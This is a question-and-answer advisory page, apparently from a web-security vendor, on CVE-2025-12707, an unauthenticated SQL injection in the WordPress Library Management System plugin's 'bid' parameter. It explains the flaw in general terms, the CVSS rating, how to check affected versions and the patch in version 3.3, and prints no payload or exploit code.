CVE-2025-12707 is a high-severity SQL Injection vulnerability found in the Library Management System plugin for WordPress, affecting versions up to and including 3.2.1. It allows unauthenticated attackers to inject arbitrary SQL commands through the ‘bid’ parameter, potentially leading to sensitive data exposure.
How does the SQL Injection work?
Mechanism of exploitation
The vulnerability occurs due to insufficient input validation in the SQL query that handles the ‘bid’ parameter. Attackers can craft a malicious payload to append SQL commands, which the application executes, allowing them to retrieve sensitive information from the database.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Library Management System plugin version 3.2.1 or earlier is at risk. Administrators should check their plugin version and update if they are using a vulnerable version.
How can I check if my site is vulnerable?
Verifying plugin versions
To check if your site is vulnerable, log into your WordPress admin panel, navigate to the Plugins section, and verify the version of the Library Management System plugin. If it is 3.2.1 or lower, your site is vulnerable.
How can I fix the vulnerability?
Updating the plugin
The vulnerability is patched in version 3.3 of the Library Management System plugin. Administrators should update to this version or later to mitigate the risk of exploitation.
What are the practical risks of this vulnerability?
Understanding the severity
The CVSS score of 7.5 indicates a high severity level, meaning that successful exploitation can lead to complete database compromise. Attackers could access sensitive user information, including credentials and personal data, without needing authentication.
What is the significance of the CVSS score?
Interpreting the risk level
The CVSS score provides a standardized way to assess the severity of vulnerabilities. A score of 7.5 indicates a high risk, suggesting that the vulnerability could lead to significant data breaches and requires immediate attention from site administrators.
What does the proof of concept demonstrate?
Example of exploitation
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a specially crafted HTTP GET request with a malicious ‘bid’ parameter. This request can extract sensitive information from the database, demonstrating the risk posed by the vulnerability.
What are the consequences of exploitation?
Potential impacts on the site
If exploited, attackers can extract sensitive data such as user credentials and library records, leading to data breaches and potential unauthorized access to the site. This can have serious implications for user privacy and site integrity.
Is there any way to mitigate the risk if I cannot update immediately?
Temporary measures
If immediate updates are not possible, consider disabling the Library Management System plugin until you can apply the patch. Additionally, review your site’s security settings and monitor for unusual activity in your database.
How does insufficient input validation lead to SQL Injection?
Technical explanation
Insufficient input validation allows user-supplied data to be directly included in SQL queries without proper sanitization. This enables attackers to manipulate the query structure, injecting malicious SQL commands that the database executes.
What steps should I take after updating the plugin?
Post-update actions
After updating the plugin, monitor your site for any unusual activity and review your security practices. Regularly update all plugins and themes, and consider implementing additional security measures such as web application firewalls.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations